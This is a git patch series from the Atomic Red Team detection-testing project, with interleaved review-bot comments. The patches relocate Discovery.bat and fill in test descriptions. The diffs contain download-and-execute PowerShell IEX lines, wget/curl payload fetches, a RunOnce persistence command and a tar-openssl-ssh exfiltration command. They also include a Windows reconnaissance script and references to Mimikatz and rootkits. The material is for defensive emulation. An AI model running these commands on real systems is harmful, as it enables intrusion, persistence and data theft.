Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | [Bypass User Account Control](./T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) | From 16a9e95f1601cf7fb3bd9396bd2c6cac52e98ebd Mon Sep 17 00:00:00 2001 From: Brian Beyer Date: Fri, 26 Oct 2018 15:00:21 -0600 Subject: [PATCH 3/5] Don't validate the template because of todos --- bin/validate-atomics.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/bin/validate-atomics.rb b/bin/validate-atomics.rb index 7dadae9f..f22f9788 100755 --- a/bin/validate-atomics.rb +++ b/bin/validate-atomics.rb @@ -9,7 +9,7 @@ ATOMIC_TEST_TEMPLATE = "#{File.dirname(File.dirname(__FILE__))}/atomic_red_team/ oks = [] fails = [] -(ATOMIC_RED_TEAM.atomic_test_paths + [ATOMIC_TEST_TEMPLATE]).each do |path| +ATOMIC_RED_TEAM.atomic_test_paths.each do |path| begin print "Validating #{path}..." YAML.load_file(path) From 7bc7660f4f6d372838e37168ad3952ea9bac5ee5 Mon Sep 17 00:00:00 2001 
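Review bot: `YAML.load_file(path)` on the line after the changed iterator in validate-atomics.rb still parses every atomic with Psych's full loader, which on Ruby releases before 3.1 instantiates arbitrary tagged objects from the file, and the whole point of this script is to read contributor-submitted YAML; use `YAML.safe_load(File.read(path))` instead, adding the alias/permitted-class options only if some atomic actually relies on anchors. The change also leaves `ATOMIC_TEST_TEMPLATE` (visible in the hunk header) defined but no longer referenced, so either remove the constant or keep validating the template with a loader that tolerates its TODO placeholders. The `each` block continues past the end of the hunk.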
From: Michael Haag Date: Fri, 2 Nov 2018 14:17:39 -0600 Subject: [PATCH 4/5] Discovery.bat Update (#397) * Discovery and Cleanup * Generate docs from job=validate_atomics_generate_docs branch=Discovery * mv discovery.bat * Fixed Discovery.bat URLs Updated Techniques with new location of discovery.bat * Generate docs from job=validate_atomics_generate_docs branch=Discovery --- .../chain_reaction_Argonaut.ps1 | 4 +- .../chain_reaction_Plutonium.bat | 2 +- .../chain_reaction_Reactor.bat | 2 +- ARTifacts/Labs/Webinar11062017-Labs.bat | 2 +- ARTifacts/Misc/Discovery.bat | 44 ++++++ atomics/T1002/T1002.md | 6 +- atomics/T1014/T1014.md | 19 +-- atomics/T1022/T1022.md | 2 +- atomics/T1030/T1030.md | 5 - atomics/T1048/T1048.md | 7 + atomics/T1060/T1060.md | 2 +- atomics/T1060/T1060.yaml | 2 +- atomics/T1074/T1074.md | 2 +- atomics/T1074/T1074.yaml | 2 +- atomics/T1105/T1105.md | 8 +- atomics/T1105/T1105.yaml | 2 +- atomics/T1150/T1150.md | 2 +- atomics/T1158/T1158.md | 26 +++- atomics/T1158/T1158.yaml | 14 +- atomics/T1160/T1160.md | 2 +- atomics/T1168/T1168.md | 4 +- atomics/T1183/T1183.md | 6 +- atomics/T1207/T1207.md | 5 - atomics/index.md | 17 +- atomics/index.yaml | 145 ++++++++++-------- atomics/linux-index.md | 9 +- atomics/macos-index.md | 8 +- atomics/windows-index.md | 8 +- 28 files changed, 204 insertions(+), 153 deletions(-) create mode 100644 ARTifacts/Misc/Discovery.bat diff --git a/ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1 b/ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1 index 41f06a24..ddafcdf5 100644 --- a/ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1 +++ b/ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1 
@@ -8,11 +8,11 @@ $temp = $env:temp # Note that these are alias' for Invoke-WebRequest. # The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc) -wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\1.bat +wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat # Alternate Ending: Using curl -curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\2.bat +curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat # Execute the 1.bat file diff --git a/ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat b/ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat index 428d246d..4dd5317b 100644 --- a/ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat +++ b/ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat @@ -16,7 +16,7 @@ SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:http :: Execution: https://attack.mitre.org/wiki/Technique/T1086 :: Have PowerShell download the Discovery.bat, output to a local file (for review later) -powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > output.txt +powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt :: Tactic: Credential Access :: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136 diff --git a/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat index d2ec8167..2989138c 100644 --- a/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat 
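Review bot: Both the `wget` and `curl` lines now fetch Discovery.bat from the mutable `master` branch and write it to `$temp\1.bat` / `$temp\2.bat` for execution, so whatever that branch holds at run time is what runs on the test host — no pin, no integrity check. Pin the URL to a commit SHA (`https://raw.githubusercontent.com/redcanaryco/atomic-red-team/<commit-sha>/ARTifacts/Misc/Discovery.bat`) so the payload is immutable and its hash can be recorded next to the detections it is meant to exercise. The comment above the lines should also note that `wget`/`curl` resolve to `Invoke-WebRequest` only in Windows PowerShell; under pwsh 6+ they presumably resolve to native binaries with different arguments. The script continues past the hunk.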
+++ b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat @@ -36,7 +36,7 @@ tasklist.exe | findstr defender :: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086 :: Technique: Multiple Discovery -powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" +powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" :: Tactic: Collection :: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119 diff --git a/ARTifacts/Labs/Webinar11062017-Labs.bat b/ARTifacts/Labs/Webinar11062017-Labs.bat index 0ae3cfec..92012140 100644 --- a/ARTifacts/Labs/Webinar11062017-Labs.bat +++ b/ARTifacts/Labs/Webinar11062017-Labs.bat 
@@ -22,7 +22,7 @@ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-t :: Step 2. This payload will execute an discovery sequence T1087 :: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" +:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query 
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser diff --git a/ARTifacts/Misc/Discovery.bat b/ARTifacts/Misc/Discovery.bat new file mode 100644 index 00000000..8c51854a --- /dev/null +++ b/ARTifacts/Misc/Discovery.bat 
@@ -0,0 +1,44 @@
+net user Administrator /domain
+net Accounts
+net localgroup administrators
+net use
+net share
+net group "domain admins" /domain
+net config workstation
+net accounts
+net accounts /domain
+net view
+sc query
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
+reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+wmic useraccount list
+wmic useraccount get /ALL
+wmic startup list brief
+wmic share list
+wmic service get name,displayname,pathname,startmode
+wmic process list brief
+wmic process get caption,executablepath,commandline
+wmic qfe get description,installedOn /format:csv
+arp -a
+whoami
+ipconfig /displaydns
+route print
+netsh advfirewall show allprofiles
+systeminfo
+qwinsta
+quser
diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md
index e6209d92..4b2ecb85 100644
--- a/atomics/T1002/T1002.md
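Review bot: This file is consumed two different ways in the same patch — saved and run as a .bat (Argonaut) and fed to `IEX` in PowerShell (Plutonium, Reactor, T1060, T1074) — and the unquoted comma lists in `wmic service get name,displayname,pathname,startmode`, `wmic process get caption,executablepath,commandline` and `wmic qfe get description,installedOn /format:csv` are array literals to PowerShell, so they are presumably handed to wmic as separate arguments rather than one property list; confirm those three lines produce output under IEX. Because the fix differs per interpreter (cmd needs the bare list, PowerShell needs it quoted or preceded by `--%`), either keep a PowerShell-compatible variant or state in a header comment which consumer the file is written for. `net Accounts` and `net accounts` are the same command, so one of them can go.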
+++ b/atomics/T1002/T1002.md @@ -24,7 +24,7 @@ Requires Network: No
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell -TODO +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration **Supported Platforms:** Windows @@ -43,7 +43,7 @@ dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
## Atomic Test #2 - Compress Data for Exfiltration With Rar -TODO +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration **Supported Platforms:** Windows @@ -62,7 +62,7 @@ rar a -r #{output_file} #{input_file}
## Atomic Test #3 - Data Compressed - nix -TODO +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration **Supported Platforms:** Linux, macOS diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 3e0b9147..dfaa6352 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -20,9 +20,7 @@ Permissions Required: Administrator, SYSTEM, root - [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit) -- [Atomic Test #3 - LD_PRELOAD based Rootkit](#atomic-test-3---ld_preload-based-rootkit) - -- [Atomic Test #4 - Windows Signed Driver Rootkit Test](#atomic-test-4---windows-signed-driver-rootkit-test) +- [Atomic Test #3 - Windows Signed Driver Rootkit Test](#atomic-test-3---windows-signed-driver-rootkit-test)
@@ -63,20 +61,7 @@ sudo modprobe #{rootkit_file}

-## Atomic Test #3 - LD_PRELOAD based Rootkit -LD_PRELOAD based Rootkit - -**Supported Platforms:** Linux - - -#### Run it with `sh`! -``` -export LD_PRELOAD=$PWD/#{rootkit_file} -``` -
-
- -## Atomic Test #4 - Windows Signed Driver Rootkit Test +## Atomic Test #3 - Windows Signed Driver Rootkit Test This test exploits a signed driver to execute code in Kernel. SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 We leverage the work done here: diff --git a/atomics/T1022/T1022.md b/atomics/T1022/T1022.md index 25a4bc38..82a32bfc 100644 --- a/atomics/T1022/T1022.md +++ b/atomics/T1022/T1022.md @@ -24,7 +24,7 @@ Requires Network: No
## Atomic Test #1 - Data Encrypted -TODO +Encrypt data for exiltration **Supported Platforms:** macOS, CentOS, Ubuntu, Linux diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 62aba7e9..0d13ddf2 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -23,11 +23,6 @@ Take a file/directory, split it into 5Mb chunks **Supported Platforms:** macOS, CentOS, Ubuntu, Linux -#### Inputs -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| output_file | TODO | todo | TODO| - #### Run it with `sh`! ``` cd /tmp/ diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index 45ec39ba..01d7c654 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -51,6 +51,13 @@ Local to Remote **Supported Platforms:** macOS, CentOS, Ubuntu, Linux +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domain | target SSH domain | url | target.example.com| +| user_name | username for domain | string | atomic| +| password | password for user | string | atomic| + #### Run it with `sh`! ``` tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md index f0768a39..45069557 100644 --- a/atomics/T1060/T1060.md +++ b/atomics/T1060/T1060.md 
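Review bot: The rendered command `openssl des3 -salt -pass #{password}` does not match openssl's pass-phrase argument format — `-pass` expects a source such as `pass:<string>`, `env:VAR` or `file:path`, so with the default `atomic` openssl rejects the argument and the pipeline into `ssh` carries nothing. The fix belongs in `atomics/T1048/T1048.yaml`, which this patch does not touch: `openssl des3 -salt -pass pass:#{password}`. The hunk's tar line is the last visible line; the rest of the command is outside it.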
@@ -79,7 +79,7 @@ RunOnce Key Persistence via PowerShell #### Run it with `powershell`! ``` $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"' +set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force ```
diff --git a/atomics/T1060/T1060.yaml b/atomics/T1060/T1060.yaml index 764e5ea8..d647065d 100644 --- a/atomics/T1060/T1060.yaml +++ b/atomics/T1060/T1060.yaml @@ -56,7 +56,7 @@ atomic_tests: name: powershell command: | $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"' + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force - name: Startup Folder description: | diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index cd71c93a..bb9b4431 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -27,6 +27,6 @@ Utilize powershell to download discovery.bat and save to a local file #### Run it with `powershell`! ``` -"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log +"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log ```
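Review bot: The executor writes the `NextRun` value and removes it with `Remove-ItemProperty ... -Force` in the same command, so the `IEX ... DownloadString(...)` payload stored in RunOnce never executes at the next logon and the test only exercises the registry write; that is a sensible safety choice, but the description should say so, e.g. `The value is removed immediately; only the RunOnce write is exercised, the payload never runs.` If the intent is for the download to execute, the removal belongs in a cleanup step rather than the same command, and the URL should then be pinned to a commit SHA instead of `master` so the executed code is fixed. `thing_to_execute` is defined outside the hunk.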
diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml index 10e3dd56..3b92608b 100644 --- a/atomics/T1074/T1074.yaml +++ b/atomics/T1074/T1074.yaml @@ -13,4 +13,4 @@ atomic_tests: executor: name: powershell command: | - "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log + "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 00436463..73a586fe 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -18,20 +18,20 @@ Requires Network: Yes ## Atomic Tests -- [Atomic Test #1 - xxxx](#atomic-test-1---xxxx) +- [Atomic Test #1 - rsync - scp - sftp remote file copy](#atomic-test-1---rsync---scp---sftp-remote-file-copy)
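Review bot: In a `powershell` executor the command is a bare double-quoted string followed by a redirection, and PowerShell evaluates a quoted string as an expression that emits its text — so `c:\windows\pi.log` receives the literal text `IEX (New-Object Net.WebClient).DownloadString(...)`, not the downloaded Discovery.bat, and nothing is fetched. To stage the file as the description says, drop the outer quotes — `(New-Object Net.WebClient).DownloadString('...') > c:\windows\pi.log` — or use `Invoke-WebRequest ... -OutFile`; IEX is not needed to save content. Writing under `c:\windows` also needs an elevated session, which the test should state.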
-## Atomic Test #1 - xxxx -xxxx +## Atomic Test #1 - rsync - scp - sftp remote file copy +Utilize rsync, scp and sftp to perform a remote file copy **Supported Platforms:** Linux, macOS #### Run it with `bash`! ``` -### TODO: Not sure how to handle commands that need to be run on multiple systems +### FIX: Not sure how to handle commands that need to be run on multiple systems # Adversary System Configuration # Ensure SSH access has been configured for an adversary account diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 431ba313..36f0a948 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -12,7 +12,7 @@ atomic_tests: executor: name: bash command: | - ### TODO: Not sure how to handle commands that need to be run on multiple systems + ### FIX: Not sure how to handle commands that need to be run on multiple systems # Adversary System Configuration # Ensure SSH access has been configured for an adversary account diff --git a/atomics/T1150/T1150.md b/atomics/T1150/T1150.md index 01edcb32..6e0fd347 100644 --- a/atomics/T1150/T1150.md +++ b/atomics/T1150/T1150.md @@ -23,7 +23,7 @@ Permissions Required: User, Administrator
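Review bot: Renaming the comment from `### TODO:` to `### FIX:` silences the placeholder check without changing the fact that the `bash` executor still cannot run this test — the body visible here is guidance for configuring a second (adversary) system, not commands for the host under test. index.yaml in this same patch shows a `manual` executor with `steps:` (used by the DCShadow test), which represents a two-host procedure honestly; `executor: name: manual` with the instructions under `steps:` fits here better than a pseudo-shell script. The command body continues past the hunk.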
## Atomic Test #1 - Plist Modification -TODO +Modify MacOS plist file in one of two directories **Supported Platforms:** macOS diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md index b4536727..e6b50f68 100644 --- a/atomics/T1158/T1158.md +++ b/atomics/T1158/T1158.md @@ -41,7 +41,7 @@ Permissions Required: User - [Atomic Test #6 - Show all hidden files](#atomic-test-6---show-all-hidden-files) -- [Atomic Test #7 - Create visible Directories](#atomic-test-7---create-visible-directories) +- [Atomic Test #7 - Create Visible Directories](#atomic-test-7---create-visible-directories) - [Atomic Test #8 - Create hidden directories and files](#atomic-test-8---create-hidden-directories-and-files) @@ -67,7 +67,7 @@ echo "this file is hidden" > .hidden-directory/.hidden-file
## Atomic Test #2 - Mac Hidden file -TODO +Hide a file on MacOS **Supported Platforms:** macOS @@ -99,11 +99,16 @@ mv #(unknown) .#{output_filename}
## Atomic Test #4 - Hidden files -Requieres Apple Dev Tools +Requires Apple Dev Tools **Supported Platforms:** macOS +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| filename | path of file to hide | path | /tmp/evil| + #### Run it with `sh`! ``` setfile -a V #(unknown) @@ -112,11 +117,16 @@ setfile -a V #(unknown)
## Atomic Test #5 - Hide a Directory -xxx +Hide a directory on MacOS **Supported Platforms:** macOS +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| filename | path of file to hide | path | /tmp/evil| + #### Run it with `sh`! ``` chflags hidden #(unknown) @@ -125,7 +135,7 @@ chflags hidden #(unknown)
## Atomic Test #6 - Show all hidden files -xxx +Show all hidden files on MacOS **Supported Platforms:** macOS @@ -137,8 +147,8 @@ defaults write com.apple.finder AppleShowAllFiles YES

-## Atomic Test #7 - Create visible Directories -xxx +## Atomic Test #7 - Create Visible Directories +Create visible directories on MacOS and Linux **Supported Platforms:** macOS, Linux @@ -154,7 +164,7 @@ ls visible-directory
## Atomic Test #8 - Create hidden directories and files -xxx +Create hidden directories and files on Nix platforms **Supported Platforms:** macOS, Linux diff --git a/atomics/T1158/T1158.yaml b/atomics/T1158/T1158.yaml index 912aae16..a02bff7b 100644 --- a/atomics/T1158/T1158.yaml +++ b/atomics/T1158/T1158.yaml @@ -51,11 +51,15 @@ atomic_tests: - name: Hidden files description: | - Requieres Apple Dev Tools + Requires Apple Dev Tools supported_platforms: - macos - + input_arguments: + filename: + description: path of file to hide + type: path + default: /tmp/evil executor: name: sh command: | @@ -67,7 +71,11 @@ atomic_tests: supported_platforms: - macos - + input_arguments: + filename: + description: path of file to hide + type: path + default: /tmp/evil executor: name: sh command: | diff --git a/atomics/T1160/T1160.md b/atomics/T1160/T1160.md index 5ce8e8b1..de83827a 100644 --- a/atomics/T1160/T1160.md +++ b/atomics/T1160/T1160.md @@ -24,7 +24,7 @@ Permissions Required: Administrator
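Review bot: Both new `filename` inputs default to `/tmp/evil`, but nothing in either hunk creates that path, so `setfile -a V` and `chflags hidden` on a fresh macOS host presumably fail with a missing-file error rather than exercising the hide. Either add a setup line before the hide command (`touch #{filename}`) or document the precondition in the input: `description: path of file to hide; must already exist`. The `command: |` bodies are outside the hunk.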
## Atomic Test #1 - Launch Daemon -TODO +Utilize LaunchDaemon to launch `Hello World` **Supported Platforms:** macOS diff --git a/atomics/T1168/T1168.md b/atomics/T1168/T1168.md index 00743284..2b074f8a 100644 --- a/atomics/T1168/T1168.md +++ b/atomics/T1168/T1168.md @@ -36,7 +36,7 @@ Contributors: Anastasios Pingios
## Atomic Test #1 - Cron Job -TODO +Set a cron job **Supported Platforms:** macOS, CentOS, Ubuntu, Linux @@ -54,7 +54,7 @@ echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
## Atomic Test #2 - Cron Job -TODO +Manually set a cron job **Supported Platforms:** macOS, CentOS, Ubuntu, Linux diff --git a/atomics/T1183/T1183.md b/atomics/T1183/T1183.md index 63306fbd..6ca7caa3 100644 --- a/atomics/T1183/T1183.md +++ b/atomics/T1183/T1183.md @@ -22,13 +22,13 @@ Permissions Required: Administrator, SYSTEM - [Atomic Test #1 - IFEO Add Debugger](#atomic-test-1---ifeo-add-debugger) -- [Atomic Test #2 - IFEO GLobal Flags](#atomic-test-2---ifeo-global-flags) +- [Atomic Test #2 - IFEO Global Flags](#atomic-test-2---ifeo-global-flags)
## Atomic Test #1 - IFEO Add Debugger -TODO +Leverage Global Flags Settings **Supported Platforms:** Windows @@ -46,7 +46,7 @@ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

-## Atomic Test #2 - IFEO GLobal Flags +## Atomic Test #2 - IFEO Global Flags Leverage Global Flags Settings **Supported Platforms:** Windows diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index a8c4d756..3cb2724e 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -40,11 +40,6 @@ Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller **Supported Platforms:** Windows -#### Inputs -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| output_file | TODO | todo | TODO| - #### Run it with these steps! 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM. 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes. diff --git a/atomics/index.md b/atomics/index.md index ed22d00e..bbc18901 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -45,7 +45,7 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - Atomic Test #9: Create ADS command prompt [windows] - Atomic Test #10: Create ADS PowerShell [windows] @@ -55,7 +55,7 @@ - Atomic Test #1: Installing Hyper-V Feature [windows] - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1177 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -191,7 +191,7 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - Atomic Test #9: Create ADS command prompt [windows] - Atomic Test #10: Create ADS PowerShell [windows] @@ -200,7 +200,7 @@ - T1143 Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - T1054 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070 Indicator Removal on Host](./T1070/T1070.md) @@ -253,8 +253,7 @@ - [T1014 Rootkit](./T1014/T1014.md) - Atomic Test #1: Loadable Kernel Module based Rootkit [linux] - Atomic Test #2: Loadable Kernel Module based Rootkit [linux] - - Atomic Test #3: LD_PRELOAD based Rootkit [linux] - - Atomic Test #4: Windows Signed Driver Rootkit Test [windows] + - Atomic Test #3: Windows Signed Driver Rootkit Test [windows] - [T1085 Rundll32](./T1085/T1085.md) - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With 